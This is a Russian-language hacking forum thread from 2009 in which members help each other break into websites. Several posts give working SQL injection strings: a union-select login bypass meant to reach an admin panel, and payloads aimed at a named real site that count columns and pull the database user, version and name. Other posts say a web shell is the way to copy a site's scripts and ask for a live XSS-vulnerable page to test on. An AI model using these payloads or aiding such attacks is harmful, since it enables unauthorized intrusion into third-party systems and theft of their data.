Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    2 SeNaP

    Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p

    При волшебных_кавычках = офф

    login.php?login=-1'+union+select+123--+&p=123

    Вроде так, если я не накосячил
     
    2 people like this.
  2. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Понял одно, что один уязвимый параметр это login
    :confused:
     
    #7362 SeNaP, 3 Jun 2009
    Last edited: 3 Jun 2009
  3. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    А чего те не понятно....
    Товарищь Iceangel_ тебе же написал....
     
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Можете хотябы пример написать как крутить.... пожалуйсто
     
    #7364 SeNaP, 3 Jun 2009
    Last edited: 3 Jun 2009
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    SeNaP, откуда этот код ? Ты конкретный сайт хекаешь ? Кинь ссылку сюда либо мну в пм либо попробуй сам то что я написал

    .php?login=-1'+union+select+123--+&p=123

    Ты должен попасть в админку (но только если magic_quotes_gpc=off)
     
  6. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).

    все спомнил))) если надо то вот x3k.ru
     
  7. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    вот хороший сервис....
    http://noxak.ru/tools/
     
  8. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
    в случае истинности условия, ответ от сервера будет приходить с запозданием
     
    1 person likes this.
  9. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Чёт не какой ошибки, сервер работает без опоздания :(
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Значит мэджики включены.
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Кто знает,от какого двига табла KBArticle
     
  12. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    собственно здесь не пойму как и че, кто подскажет? :)
     
  13. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    12
    Likes Received:
    11
    Reputations:
    5
    У меня скорее просьба чем вопрос. Почитал много статей по XSS, скорее даже все. Напишите пожалуйста сюда или в личку страницу любую в инете с рабочей хсс и укажите поле, хочу попробовать найти т.к. не совсем верно понимаю систему поиска (в частности как страница реагирует на вводимые '';!--"<XSS>=&{()} например) и вообще в каком месте она должна реагировать
     
  14. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Посмотри в этой теме
    --->
    Активные XSS
    <---
    Тут достаточно много активных XSS выложено...
     
    #7374 farex, 5 Jun 2009
    Last edited: 5 Jun 2009
  15. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Здравствуйте, можете пожалуйсто сказать, каким образом сливаются скрипты с сайтов?
     
  16. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Через шелл, а шелл сначала надо залить
     
  17. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    http://old.guoedu.ru/priemnaja/?doc='
    кто поможет? :)
     
  18. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://old.guoedu.ru/avg_conf/?doc=111+order+by+8/* 8 полей, но тут тяжелый случай -2йной запрос...
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://old.guoedu.ru/forum/?doc=115&act=forum&id=-2++union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9--&topic=6
     
  20. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    суть вопроса.
    запрос: select ... from ... where ... order by act_(вот после этого я могу подставить что нить в запрос)
    в ответе можно веть по сортировке узнать как выполнился запрос но в том то и дело что таблица пустая из которой все это выводится.
    union тоже не прокатит после order
    версия mysql 4.x
    какие есть соображения?
     
Thread Status:
Not open for further replies.